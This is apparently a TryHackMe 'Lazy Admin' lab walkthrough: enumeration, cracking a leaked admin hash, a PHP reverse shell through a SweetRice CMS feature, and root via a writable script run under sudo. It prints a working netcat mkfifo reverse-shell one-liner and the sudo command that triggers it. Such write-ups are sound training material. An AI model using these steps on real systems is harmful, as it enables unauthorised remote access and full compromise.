Tryhackme | Lazy Admin

What’s worse than an admin? A lazy admin! This is easy level tryhackme room that exploits bad practices and weak passwords.

A lazy admin!

Tasks

• user.txt
• root.txt

Vulnerability

• Saving backup file with credentials on exposed directory.RCE through reverse shell using ads feature.
• RCE through reverse shell using ads feature.
• Allowing www-data to have sudo privileges and access home directories.

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster

/content              (Status: 301) [Size: 310] 
/index.html           (Status: 200) [Size: 11321]                               
/index.html           (Status: 200) [Size: 11321]                               
/server-status        (Status: 403) [Size: 275]

We have too little information and need to enumerate more on /content

Further Enumeration

/.hta.html            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/_themes              (Status: 301) [Size: 318] 
/.hta.txt             (Status: 403) [Size: 275]   
/.htpasswd.txt        (Status: 403) [Size: 275]   
/.htaccess.php        (Status: 403) [Size: 275]  
/.htpasswd.php        (Status: 403) [Size: 275]                                         
/.hta                 (Status: 403) [Size: 275]                                         
/.htaccess.html       (Status: 403) [Size: 275]                                         
/.htpasswd.html       (Status: 403) [Size: 275]                                         
/.hta.php             (Status: 403) [Size: 275]                                         
/.htaccess.txt        (Status: 403) [Size: 275]                                         
/as                   (Status: 301) [Size: 313]   
/attachment           (Status: 301) [Size: 321] 
/changelog.txt        (Status: 200) [Size: 18013]                                          
/images               (Status: 301) [Size: 317]  
/inc                  (Status: 301) [Size: 314]  
/index.php            (Status: 200) [Size: 2196]                                           
/index.php            (Status: 200) [Size: 2196]                                           
/js                   (Status: 301) [Size: 313]  
/license.txt          (Status: 200) [Size: 15410]

• /as brings to a login page
• /inc brings to files where there is a backup folder.
• /changelog.txt reveals CMS is SweetRice version 1.5.1

Possible credentials in .sql file

'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');'

• Possible users are admin and manager.
• hashid confirms the hash is likely MD variants.
• Using crackstation.com the password is Password123.

Foothold

• Able to login through /as with user manager and password Password123
• Searching Sweetrice 1.5.1 reveals an exploit that uses the ads feature to perform RCE.
• Able to create a php reverse shell from the ads menu. Checkout pentestmonkey php-reverse-shell for more information
• Executing the script returns us a reverse shell on port 4444.

Privesc

• Able to enter itguy’s home directory as www-data.
• Found user.txt and mysql_login.txt in directory.
• mysql_login.txt contains credentials of rice.
• User www-data unable to create a script file.
• But user www-data can run sudo on backup.pl apparently

#!/usr/bin/perl

system("sh", "/etc/copy.sh");

• Script seems to run copy.sh from /etc/, www-data no write permission for backup.pl

-rw-r--rwx 1 root root 81 Nov 29  2019 copy.sh

• Our user have permission to write to copy.sh and it will run as root.
• Unable to use vi,vim,nano. Need to direct STDIN to file.
• Apparently there is already a reverse shell script in copy.sh
• Edit host and port to ours attackers.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

• Since we can get root privileges on /usr/bin/perl on back.up perl let’s do that.

sudo /usr/bin/perl /home/itguy/backup.pl

• Editing the IP adress and port we get a root shell on port 9999
• root.txt found on /root